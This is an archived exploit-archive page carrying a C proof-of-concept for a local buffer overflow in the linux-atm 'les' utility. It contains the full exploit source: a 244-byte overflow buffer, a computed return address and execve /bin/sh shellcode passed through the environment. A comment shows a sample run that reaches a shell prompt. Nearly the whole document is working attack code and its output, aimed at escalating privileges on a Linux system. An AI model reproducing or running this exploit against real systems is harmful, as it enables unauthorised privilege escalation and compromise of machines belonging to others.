TUCoPS :: Linux :: General :: bt269.txt

ATM on linux Exploit(les,local)




/*  ATM on linux Exploit

*** vulnerability discovered by Angelo Rosiello

*** sorry for my poor english.

*** i wrote this exploit just for fun.

*** i can't get a rootshell on my linux :(

*** tested on redhat7.3 ,other linux maybe OK,too.

*** atm package:linux-atm-2.4.0-1.i386.rpm

*** http://sourceforge.net/projects/linux-atm

***

*** Here is another exploit by Angelo Rosiello

*** But i can't get shell with this code

*** http://www.securiteam.com/exploits/5EP0M1P9PO.html

***************************************************



   Buffer is 244 bytes

   using 244+4 bytes to overwrite eip.



***************************************************

*** AUTOR:@Xis2(ph4nt0m)

*** CONTACT:axis@ph4nt0m.net

*** COPYRIGHT (c) 2003 PH4NT0M SECURITY

*** http://www.ph4nt0m.net

*** 2003.5.15

***************************************************



[tt@PH4NT0M explab]$ gcc -o linux_atm myatm.c

[tt@PH4NT0M explab]$ ./linux_atm

****************************************



linux-atm exploit!



Coded by @Xis2(ph4nt0m)

Welcome to http://www.ph4nt0m.net



Jump to 0xbffffa5c

****************************************





DEBUG: Log opened

NOTE: Configuration file: 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAA??

sh-2.05a$



***************************************************



*/





#include<stdio.h>

#include<stdlib.h>

#include<unistd.h>



#define  BSIZE               244



/*  linux x86 shellcode by bob from dtors.net,23 bytes  */

char shellcode[]="\x31\xc0\x50\x68\x6e\x2f\x73\x68"

"\x68\x2f\x2f\x62\x69\x89\xe3\x50"

"\x53\x89\xe1\xb0\x0b\xcd\x80";





int main(int argc,char *argv[]){

    char buf[BSIZE+10];

    char  *prog[]={"/usr/local/sbin/les","-f",buf,NULL};

    char  *env[]={"HOME=/root",shellcode,NULL};

    unsigned long ret;



    printf("****************************************\n\n");

    printf("Linux-atm exploit!\n\n");

    printf("Coded by @Xis2(ph4nt0m)\n");

    printf("Welcome to http://www.ph4nt0m.net\n\n");

    printf("Jump to 0x%08x\n",&ret);

    printf("****************************************\n\n\n");





/* calculate the shellcode address  */

    ret=0xc0000000-sizeof(void *)-strlen(prog[0])-strlen(shellcode)-0x02;



/* construct our evil buffer  */

    memset(buf,0x41,sizeof(buf));

    memcpy(buf+BSIZE+4,(char *)&ret,4);

    buf[BSIZE+8]=0x00;



    execve(prog[0],prog,env);



    return  0;

}




TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH